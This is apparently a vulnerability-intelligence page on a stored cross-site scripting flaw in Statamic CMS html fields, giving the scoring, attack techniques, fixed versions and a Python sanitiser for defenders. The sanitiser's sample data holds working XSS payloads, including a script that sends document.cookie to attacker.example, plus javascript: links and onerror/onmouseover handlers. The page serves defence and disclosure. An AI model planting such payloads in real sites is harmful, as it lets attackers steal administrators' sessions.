Cyber Posture

CVE-2026-27196

Severity: High

Published: 21 February 2026
Modified: 30 March 2026
KEV Added: not listed
Patch: available (6.3.2 and 5.73.9)
CVSS Score: 8.1 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N)
EPSS Score: 0.0001 (2.7th percentile)
Risk Priority: 16 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2026-27196 is a high-severity stored cross-site scripting (CWE-79) vulnerability in the html fieldtypes of Statamic (vendor: Statamic), a Laravel and Git powered CMS. Its CVSS base score is 8.1 (High). The vector is worth reading closely: PR:H means the attacker already holds an account with field-management permissions, UI:R means a victim must view the poisoned content, and S:C means the impact lands in the session of a different, higher-privileged user than the one who planted the payload.

Operationally, exploitation aligns with the MITRE ATT&CK technique Browser Session Hijacking (T1185). Its EPSS score (0.0001) sits at the 2.7th percentile of exploit likelihood, well below the median, and it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation), applied when html fields are saved, and SI-15 (Information Output Filtering), applied when they are rendered.

Threat & Defense at a Glance

What attackers do: exploitation maps to Browser Session Hijacking (T1185) and two further techniques, Steal Web Session Cookie (T1539) and Web Session Cookie (T1550.004). What defenders deploy: the NIST 800-53 controls recommended below, chiefly SI-10 and SI-15.
Threat & Defense Details

Mitigating Controls (NIST 800-53 r5) (AI-generated mapping)

SI-10 Information Input Validation (prevent)
Requires validation of inputs to html fieldtypes to detect and reject, or sanitize, malicious JavaScript payloads before they are stored.

SI-15 Information Output Filtering (prevent)
Mandates filtering or encoding of output from html fields so that a stored malicious script cannot execute in a viewer's browser even if it reached storage.

Flaw remediation (prevent)
Ensures timely remediation of the stored XSS flaw by applying the vendor's fixed releases: 6.3.2 on the 6.x branch or 5.73.9 on the 5.x branch.
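The two preventive controls above, input validation on save and output filtering on render, as an added illustration. This is example code written for this page, not Statamic's own code or its fix (Statamic is PHP/Laravel; the real patch is in the commits referenced in the analysis on this page). It uses only the Python standard library; the tag and attribute allowlist, the function names and the sample field values are all assumptions for the example, and a production deployment should rely on a vetted sanitiser such as DOMPurify or HTML Purifier rather than a hand-rolled parser. Because the sanitiser records everything it strips, the same pass doubles as an audit of html-field content that was saved before a fix was applied.

```python
"""Allowlist sanitiser and output filtering for a CMS "html" field.

Added example for this page; not Statamic's code or its fix. Shows the two
controls named above: validate on input (SI-10) and filter again on output
(SI-15). The allowlist below is assumed for the example; production code
should use a vetted sanitiser (DOMPurify, HTML Purifier) instead of this.
"""
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist for a rich-text field: structure and links only.
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "ul", "ol", "li",
                "a", "h2", "h3", "code", "pre"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
VOID_TAGS = {"br"}
SAFE_URL_SCHEMES = {"", "http", "https", "mailto"}  # "" = relative URL
RAW_TEXT_TAGS = {"script", "style"}  # their body is dropped entirely

def _safe_href(value: str) -> bool:
    """Scheme allowlist. Browsers strip tab/CR/LF and other C0 controls from
    URLs, so remove them before parsing or 'java\\tscript:' slips through."""
    cleaned = re.sub(r"[\x00-\x20]", "", value)
    return urlparse(cleaned).scheme.lower() in SAFE_URL_SCHEMES

class HtmlFieldSanitizer(HTMLParser):
    """Rebuilds input from allow-listed tags/attributes and records every drop."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)  # attrs and text arrive decoded
        self.out: list[str] = []
        self.findings: list[str] = []
        self._raw_depth = 0  # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in RAW_TEXT_TAGS:
            self._raw_depth += 1
            self.findings.append(f"dropped <{tag}> element")
            return
        if tag not in ALLOWED_TAGS:  # covers <img onerror>, <svg onload>, <iframe>, ...
            self.findings.append(f"dropped <{tag}> tag")
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):  # onerror, onload, onmouseover, ...
                self.findings.append(f"dropped event handler {name} on <{tag}>")
            elif name not in ALLOWED_ATTRS.get(tag, set()):
                self.findings.append(f"dropped attribute {name} on <{tag}>")
            elif name == "href" and not _safe_href(value):
                self.findings.append(f"dropped unsafe href {value!r}")
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in RAW_TEXT_TAGS:
            self._raw_depth = max(0, self._raw_depth - 1)
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self._raw_depth == 0:
            self.out.append(escape(data, quote=False))  # re-encode text nodes

    def result(self) -> str:
        return "".join(self.out)

def sanitize_html_field(value: str) -> tuple[str, list[str]]:
    """SI-10, on save: returns (clean_html, findings); store clean_html or reject."""
    parser = HtmlFieldSanitizer()
    parser.feed(value)
    parser.close()
    return parser.result(), parser.findings

def render_html_field(stored: str) -> str:
    """SI-15, on render: sanitise again so content that bypassed validation is inert."""
    clean, _ = sanitize_html_field(stored)
    return clean

def audit_stored_fields(fields: dict[str, str]) -> dict[str, list[str]]:
    """Report every stored field whose value the sanitiser would alter."""
    report = {}
    for name, value in fields.items():
        _, findings = sanitize_html_field(value)
        if findings:
            report[name] = findings
    return report

# Constructed sample values for the demo; not real Statamic content.
SAMPLE_FIELDS = {
    "bio": "<p>Hello <b>world</b></p>",
    "promo": '<p>Deal</p><script>fetch("https://attacker.example/c?" + document.cookie)</script>',
    "footer": '<a href="javascript:alert(document.domain)">terms</a><img src=x onerror="alert(1)">',
    "note": '<p onmouseover="alert(1)">hover</p>',
}
```

Calling `audit_stored_fields(SAMPLE_FIELDS)` flags `promo`, `footer` and `note` and leaves `bio` alone; `render_html_field` on any of them returns markup with the script element, event handler and `javascript:` link removed. Two design points matter for this bug class: attribute values are checked after entity decoding (so `&#106;avascript:` is caught as `javascript:`), and the URL scheme check strips control characters first, because browsers do the same before deciding what `java<TAB>script:` means.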

MITRE ATT&CK Enterprise Techniques (AI-generated mapping)

T1185 Browser Session Hijacking (Collection)
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
T1539 Steal Web Session Cookie (Credential Access)
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.
T1550.004 Use Alternate Authentication Material: Web Session Cookie (Lateral Movement)
Adversaries can use stolen session cookies to authenticate to web applications and services.

Why these techniques?

Stored XSS places attacker-controlled JavaScript in content that higher-privileged (admin) users view, so the script runs inside their browser session (T1185), can read or exfiltrate the web session cookie (T1539), and that cookie can then be replayed to authenticate as the victim (T1550.004). Marking the session cookie HttpOnly blunts T1539 and T1550.004 but not T1185: script already running in the victim's session can issue authenticated requests without ever reading the cookie.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

NVD Description

Statamic is a Laravel and Git powered content management system (CMS). Versions 5.73.8 and below in addition to 6.0.0-alpha.1 through 6.3.1 have a Stored XSS vulnerability in html fieldtypes which allows authenticated users with field management permissions to inject malicious JavaScript that executes when viewed by higher-privileged users. This issue has been fixed in 6.3.2 and 5.73.9.

Deeper analysis (AI-generated)

CVE-2026-27196 is a Stored Cross-Site Scripting (XSS) vulnerability (CWE-79) in the html fieldtypes of Statamic, a Laravel and Git-powered content management system (CMS). It affects versions 5.73.8 and below, as well as 6.0.0-alpha.1 through 6.3.1. The vulnerability, published on 2026-02-21, carries a CVSS v3.1 base score of 8.1 (AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N).

Authenticated users with field management permissions can exploit this by injecting malicious JavaScript into html fields. The payload is stored and executes in the browser of higher-privileged users who view the affected content, enabling theft of sensitive data or unauthorized actions in the victim's session context. The vector reflects this: PR:H because the attacker already needs field-management rights, UI:R because a victim has to view the content, and S:C because the impact lands in a different, higher-privileged user's session than the one that planted the payload.

The issue has been fixed in Statamic versions 6.3.2 (6.x branch) and 5.73.9 (5.x branch). Mitigation is to update to one of these releases, as detailed in the GitHub security advisory at https://github.com/statamic/cms/security/advisories/GHSA-8r7r-f4gm-wcpq and the patching commits https://github.com/statamic/cms/commit/11ae40e62edd3da044d37ebf264757a09cc2347b and https://github.com/statamic/cms/commit/6c270dacc2be02bfc2eee500766f3309f59d47b3. Because the flaw is stored, it is also worth reviewing html-field content saved by field-management users while a vulnerable version was in use, rather than relying on the upgrade alone.

Details

CWE(s)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Affected Products

Vendor: statamic
Product: statamic
Affected versions: ≤ 5.73.8 · 6.0.0-alpha.1 to 6.3.1 (fixed in 5.73.9 and 6.3.2)

CVEs Like This One

CVE-2026-28426 (same product: Statamic Statamic)
CVE-2026-33172 (same product: Statamic Statamic)
CVE-2026-25759 (same product: Statamic Statamic)
CVE-2026-27939 (same product: Statamic Statamic)
CVE-2026-28425 (same product: Statamic Statamic)
CVE-2026-27593 (same product: Statamic Statamic)
CVE-2026-28423 (same product: Statamic Statamic)
CVE-2026-41175 (same product: Statamic Statamic)
CVE-2026-24836 (shared CWE-79)
CVE-2026-28754 (shared CWE-79)

References

GitHub security advisory: https://github.com/statamic/cms/security/advisories/GHSA-8r7r-f4gm-wcpq
Fix commits: https://github.com/statamic/cms/commit/11ae40e62edd3da044d37ebf264757a09cc2347b and https://github.com/statamic/cms/commit/6c270dacc2be02bfc2eee500766f3309f59d47b3